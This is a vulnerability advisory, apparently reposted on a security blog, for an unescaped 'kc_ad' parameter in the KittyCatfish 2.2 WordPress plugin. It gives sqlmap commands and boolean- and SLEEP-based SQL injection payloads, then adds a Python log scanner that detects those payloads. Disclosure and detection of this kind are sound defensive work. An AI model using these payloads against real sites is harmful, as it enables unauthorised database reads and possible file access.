WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description

An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.

The GET parameter 'kc_ad' is vulnerable.

2. Proof of concept

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0" --dbms --threads=10 --random-agent

OR

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" --dbms --threads=10 --random-agent --dbms=mysql --level 5 --risk=3

Parameter: kc_ad (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=31 AND 2281=2281&ver=2.0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0
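Because the advisory reports the issue as unfixed, a site operator's first line of defence is noticing attempts against the kc_ad parameter in the web-server logs. The following is an added example, written for this page and not taken from the advisory or the plugin; it scans constructed Apache combined-format log lines for requests to the plugin's two endpoints named above, and flags any kc_ad value that is not a plain integer. The two payload shapes it labels (the "AND n=n" boolean test and the SLEEP() time-based test) are the ones sqlmap reported above; the assumption that a legitimate kc_ad is always numeric is mine, based on the advisory's own requests using 31 and 37.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path prefix of the vulnerable plugin, as seen in the advisory's PoC URLs.
PLUGIN_PATH = "/wp-content/plugins/kittycatfish/"

# Apache combined-format request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Injection shapes taken from the sqlmap output in the advisory.
BOOLEAN_RE = re.compile(r"\bAND\b\s+\d+\s*=\s*\d+", re.IGNORECASE)
TIME_RE = re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.IGNORECASE)

# Constructed sample log lines (not real traffic). Lines 2 and 3 carry the two
# payload shapes from the advisory, URL-encoded as a browser or tool would send them;
# line 4 is a non-numeric id; line 5 targets a path outside the plugin and is ignored.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2017:10:00:01 +0000] "GET /wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Mar/2017:10:00:02 +0000] "GET /wp-content/plugins/kittycatfish/base.css.php?kc_ad=31%20AND%202281%3D2281&ver=2.0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Mar/2017:10:00:03 +0000] "GET /wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=31%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))xzZh)&ver=2.0 HTTP/1.1" 200 512 "-" "sqlmap/1.1"
10.0.0.9 - - [20/Mar/2017:10:00:04 +0000] "GET /wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=abc&ver=2.0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Mar/2017:10:00:05 +0000] "GET /index.php?kc_ad=31%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def classify_kc_ad(value):
    """Return None for a benign (purely numeric) ad id, otherwise a finding label.

    The numeric-only assumption is ours, not something the advisory states.
    """
    if re.fullmatch(r"\d+", value):
        return None
    if TIME_RE.search(value):
        return "time-based-blind"
    if BOOLEAN_RE.search(value):
        return "boolean-based-blind"
    return "non-numeric"


def scan_log(text):
    """Parse log lines and return findings for suspicious kc_ad values on plugin URLs."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(PLUGIN_PATH):
            continue  # only the plugin's endpoints take kc_ad
        # parse_qs percent-decodes values, so encoded spaces and '=' are restored
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("kc_ad", []):
            label = classify_kc_ad(raw)
            if label:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "path": parts.path,
                    "kc_ad": raw,
                    "label": label,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} kc_ad={f['kc_ad']!r} -> {f['label']}")
```

Running the script over the constructed sample reports three findings (one boolean-based, one time-based, one plain non-numeric id) and nothing for the first and last lines. The same whitelist idea, rejecting anything but an integer before the value reaches a query, is also the shape of the fix the plugin itself needs; a log-side detector only buys time until such a fix ships.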

3. Attack outcome

An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

4. Impact

Critical

5. Affected versions

<= 2.2

6. Disclosure timeline

06-Mar-2017 - found the vulnerability
06-Mar-2017 - informed the developer
20-Mar-2017 - release date of this security advisory

Not fixed at the date of submitting this exploit.

Permanent link to this article: https://www.unhonker.com/bug/1991.html | 90' s Blog | Focus on network information security

This post was published by unhonker on 26 April 2017 in the 漏洞公布 (Vulnerability Disclosures) category; you may leave a comment, and you may quote it on your own website or blog provided the original URL and author are retained.